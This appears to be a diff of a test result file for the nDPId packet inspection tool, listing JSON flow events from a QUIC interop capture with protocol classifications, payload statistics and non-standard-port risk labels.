-00855{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434680,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00825{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434656,"flow_last_seen":1603816435111,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00859{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434729,"flow_last_seen":1603816444586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434507,"flow_last_seen":1603816444490,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37643,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434765,"flow_last_seen":1603816435194,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434648,"flow_last_seen":1603816434782,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1287,"flow_avg_l4_payload_len":643,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":34903,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434587,"flow_last_seen":1603816444528,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59171,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434523,"flow_last_seen":1603816434855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46576,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434629,"flow_last_seen":1603816434766,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1112,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"131.159.24.198","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434657,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2464,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":38077,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434670,"flow_last_seen":1603816434802,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434542,"flow_last_seen":1603816444513,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":60784,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434794,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":50289,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434569,"flow_last_seen":1603816444507,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434855,"flow_last_seen":1603816434997,"flow_idle_time":140000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434584,"flow_last_seen":1603816434709,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434640,"flow_last_seen":1603816434640,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":45250,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434822,"flow_last_seen":1603816434822,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2604:a880:800:a1::1279:3001","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434664,"flow_last_seen":1603816444508,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434628,"flow_last_seen":1603816435041,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38933,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00861{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434722,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":51040,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434601,"flow_last_seen":1603816435020,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":37784,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00661{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434530,"flow_last_seen":1603816434530,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"3.121.242.54","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434659,"flow_last_seen":1603816434682,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434766,"flow_last_seen":1603816435089,"flow_idle_time":140000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2662,"flow_avg_l4_payload_len":665,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434586,"flow_last_seen":1603816434622,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434721,"flow_last_seen":1603816435054,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2590,"flow_avg_l4_payload_len":647,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":39975,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} +00738{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434507,"flow_last_seen":1603816434548,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":37876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00851{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434590,"flow_last_seen":1603816434688,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":35643,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434628,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":52271,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434684,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":35263,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00868{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434652,"flow_last_seen":1603816434749,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":45852,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00864{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434707,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":44924,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00738{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434641,"flow_last_seen":1603816435089,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":42456,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 